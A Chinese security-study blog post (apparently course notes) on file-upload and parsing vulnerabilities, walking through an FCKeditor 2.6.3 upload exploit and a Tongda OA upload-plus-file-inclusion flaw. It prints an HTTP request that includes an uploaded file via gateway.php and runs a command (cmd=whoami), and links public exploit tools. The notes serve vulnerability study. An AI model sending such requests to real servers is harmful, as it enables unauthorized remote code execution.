23:WEB漏洞-文件上传之解析漏洞编辑器安全(转)

已于 2022-04-01 22:57:05 修改
阅读量482 收藏 1
点赞数
分类专栏: 小迪笔记 文章标签: 编辑器漏洞 中间件
于 2022-04-01 22:56:02 首次发布
原文链接:https://www.cnblogs.com/zhengna/p/15629388.html
版权

23:WEB漏洞-文件上传之解析漏洞编辑器安全

实验还没弄,未完待续.。。。

本课重点

  • 几种常见中间件解析漏洞简要演示
    • 案例1:中间件解析漏洞思维导图
  • 几种常见Web编辑器简要演示
    • 案例2:fckeditor2.6.3 文件上传漏洞
  • 几种常见CMS文件上传简要演示
    • 案例3:通达OA文件上传+文件包含漏洞
  • 贴近实际应用下的以上知识点演示
    • 案例4:贴近实际应用下以上知识点总结

案例1:中间件解析漏洞思维导图

img

在这里插入图片描述

演示案例见上篇博客

案例2:fckeditor2.6.3 文件上传漏洞

编辑器漏洞整理

<1>将以下exp代码复制到fck.php文件中

+ View Code

<2>把fck.php复制到本地php的安装目录中

img

<3>在命令行执行代码,成功上传后门到服务器

img

img

<4>访问后门地址,成功利用。

其他可参考:https://navisec.it/编辑器漏洞手册/

案例3:通达OA文件上传+文件包含漏洞

1漏洞描述:

  • 该漏洞在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合文件包含漏洞最终造成远程代码执行漏洞,从而导致可以控制服务器system权限。

2漏洞原理:

  • 在通达OA上传漏洞中,上传文件upload在通达OA上传漏洞中,上传文件upload.php文件中存在一个p参数,如果p参数,如果p非空就可以跳过auth.php验证机制:img
  • 文件包含漏洞存在于geteway.php文件中,可直接包含url:img

3漏洞复现:

<1>下载安装通达OA并访问

img

<2>访问上传目录,我使用的是V11版本,路径为:ispirit/im/upload.php。Burp抓包构造数据包上传文件,POC为:

+ View Code

<3>发送POC,上传成功。

img

<4>上传成功后访问文件包含路径/ispirit/interface/geteway.php,burp抓包构造数据包发送指令。

POST /mac/gateway.php HTTP/1.1``Host: 10.10.20.116:88(根据自己的IP而定)``Connection: keep-alive``Accept-Encoding: gzip, deflate``Accept: */*``User-Agent: python-requests/2.21.0``Content-Length: 69``Content-Type: application/x-www-form-urlencoded` `json={``"url"``:``"/general/../../attach/im/2003/941633647.jpg"``}&cmd=whoami

<5>命令执行成功。

img

<6>也可以使用POC工具

  • https://github.com/M4tir/tongda-oa-tools
  • https://github.com/fuhei/tongda_rce

4修复建议:

  • 更新官方补丁

参考:https://www.cnblogs.com/twlr/p/12989951.html

案例4:贴近实际应用下以上知识点总结

判断中间件平台,编辑器类型或CMS名称进行测试

明月清风~~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
weixin_50698958的博客
10-05 292
一、概述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 参考: https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 二、漏洞环境 路径:vulhub/httpd/CVE-2017-15715 启动环境:docker-compose up -d 访.
15-编辑器漏洞1
08-03
综上,文件上传漏洞Web应用程序安全中的常见问题,特别是在富文本编辑器中。理解并防范这类漏洞,对于保护网站免受恶意攻击至关重要。开发者应确保对上传的文件进行严格的类型检查和内容验证,避免允许执行任何...
小迪安全学习笔记--第23天:web漏洞-文件上传解析漏洞编辑器安全
zr1213159840的博客
12-20 1897
各个平台漏洞解析讲解 iis papche nginx 各个web编辑器安全讲解 https://navisec.it/编辑器漏洞手册/ 目前比较多的编辑器是fck 各个cms文件上传简要讲解 wordpress phpcms 演示案例 几种中间件解析漏洞简要演示 参考共享的中间件漏洞PDF 工IS6/7简要说明-本地搭建 Apache配置安全-—vulhub Apache解析漏洞-低版本 解释 x.php.xxx.yy 识别最后的yyy 如果不识别 向前解析 直到识别 利用场景 如果对方中间ap
文件上传解析漏洞编辑器
weixin_44532761的博客
12-03 159
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=22 1.几种中间件解析漏洞演示-IIS,Apache,Nginx 搭建iis服务器 http://www.360doc.com/content/19/0523/18/2238056_837752033.shtml Apache低版本解析漏洞 phpstudy默认的是2.x 我这报500 Apache 换行解析x0a-vulhub https://vulhub.org/#/environme
第33天:WEB攻防-通用漏洞&文件上传&中间件解析漏洞&编辑器安全
wuqingsix的博客
11-23 216
由于IIS符合漏洞的环境都基本存在Windows server2003的服务器上了。上传文件的目录为 1.asp的目录 1.asp/1.png也会按照asp的格式解析。访问时只需要 1.png/xxx.asp 就可以按照asp的代码解析。上传文件名为 1.asp;.png的文件会正常按照asp的格式解析。上传一张带后门的图片 1.png。
小迪安全学习笔记--第20天:web漏洞-文件上传之基础及过滤方式
zr1213159840的博客
12-16 482
cms漏洞一般是直接利用就可以了 编辑器漏洞是针对网站中的编辑器的,编辑器存在漏洞,针对编辑器进行攻击 什么是文件上传漏洞 文件上传漏洞是指由于开发人员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传漏洞有哪些危害 通过文件上传..
Web应用安全:任意文件上传.pptx
06-20
在网络安全领域,Web应用安全是至关重要的一环,而任意文件上传漏洞则是Web应用常见的安全问题之一。这个漏洞允许攻击者上传恶意文件到服务器,可能导致代码执行、数据泄露或完全控制服务器。以下是对“任意文件上传...
文件上传漏洞的思维导图
04-19
同时,对于常见的CMS漏洞,应及时更新补丁,对于编辑器漏洞,选择安全编辑器或限制其功能也很关键。 11. **利用思路**:攻击者可能通过扫描、会员中心、后台系统、CMS漏洞、代码审计、第三方应用等多种途径寻找...
fckeditor2.6.3 完整版
05-30
1.下载最新版的FCKEDITOR 2.解压缩到你的站点根文件夹中名为FCKEDITOR的文件夹中(名称必须为FCKEDITOR,因为配置文件中已经使用此名称来标示出FCKEDITOR的位置) 3.现在,编辑器就可以使用了,如果想要查看演示,可以按下面方法访问: http:///FCKeditor/_samples/default.html 注意:你可以将FCKEDITOR放置到任何文件夹,默认情况下,将其放入到FCKEDITOR文件夹是最为简单的方法.如果你放入的文件夹使用别的名称,请修改配置文件夹中编辑器BasePath参数,如下所示: oFckeditor.BasePath="/Components/fckeditor/"; 另外,FCKEDITOR文件夹中所有以下划线开头的文件夹及文件,都是可选的,可以安全的从你的发布中删除.它们并不是编辑器运行时必需的 如何将FCKEDITOR整合进我的页面? 由于目前的版本提供的FCKEDITOR仅提供了JAVASCRIPT式的整合,因此,这里仅讲述如何应用JAVASCRIPT来整合FCKEDITOR到站点中,当然,其他各种语言的整合,你可以参考_samples文件夹中的例子来完成 1,假如编辑器已经安装在你的站点的/FCKEDITOR/文件夹下.那么,第一步我们需要做的就是在页面的HEAD段中放入SCRIPT标记以引入JAVASCRIPT整合模块.例如: 其中路径是可更改的 2,现在,FCKEDITOR类已经可以使用了.有两个方法在页面中建立一个FCKEDITOR编辑器: 方法1:内联方式(建议使用):在页面的FORM标记内需要插入编辑器的地方置入以下代码: script type="text/javascript"> var oFCKeditor = new FCKeditor( 'FCKeditor1' ) ; oFCKeditor.Create() ; 方法2:TEXTAREA标记替换法(不建议使用):在页面的ONLOAD事件中,添加以下代码以替换一个已经存在的TEXTAREA标记 window.onload = function() { var oFCKeditor = new FCKeditor( 'MyTextarea' ) ; oFCKeditor.ReplaceTextarea() ; } This is the initial value. 3.现在,编辑器可以使用了 FCKEDITOR类参考: 下面是用来在页面中建立编辑器的FCKEDITOR类的说明 构造器: FCKeditor( instanceName[, width, height, toolbarSet, value] ) instanceName:编辑器的唯一名称(相当于ID) WIDTH:宽度 HEIGHT:高度 toolbarSet:工具条集合的名称 value:编辑器初始化内容 属性: instanceName:编辑器实例名 width:宽度,默认值为100% height:高度,默认值是200 ToolbarSet:工具集名称,参考FCKCONFIG.JS,默认值是Default value:初始化编辑器的HTML代码,默认值为空 BasePath:编辑器的基路径,默认为/Fckeditor/文件夹,注意,尽量不要使用相对路径.最好能用相对于站点根路径的表示方法,要以/结尾 CheckBrowser:是否在显示编辑器前检查浏览器兼容性,默认为true DisplayErrors:是否显示提示错误,默为true; 集合: Config[Key]=value; 这个集合用于更改配置中某一项的值,如 oFckeditor.Config["DefaultLanguage"]="pt-br"; 方法: Create() 建立并输出编辑器 RepaceTextArea(TextAreaName) 用编辑器来替换对应的文本框 如何配置FCKEDITOR? FCKEDITOR提供了一套用于定制其外观,特性及行为的设置集.主配置文件名为Fckconfig.js 你既可以编辑主配置文件,也可以自己定义单独的配置文件.配
FCKeditor_2.6.3+FCKeditor-2.3.rar
02-06
FCKeditor_2.6.3+FCKeditor-2.3.rar
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
03-18
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
fckeditor 2.6.3 PHP 精简优化版(附使用说明)
10-21
fckeditor 2.6.3 PHP 精简优化版(附使用说明) 修正了图片上传乱码问题 修正了编辑文章时编辑框出现HTML代码的问题 提高了兼容性
day33 文件上传&中间件解析漏洞&编辑器安全
wanjia01的博客
11-22 1091
先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无以及其他漏洞如CVE漏洞
第三十三天:文件上传&中间件解析漏洞&编辑器安全
最新发布
m0_51322401的博客
02-05 311
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无以及其他漏洞如CVE漏洞。各个平台解析漏洞讲解。
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 526
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
记Fckeditor漏洞
zhangpeng999123的博客
03-07 2265
首先是对目标站点进行了基本的测试然后发现了存在fckeditor,fckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的版本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看版本信息: 版本信息 可以看到是2.6.6的版本,那就对症下药。同时提一下,查看版...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值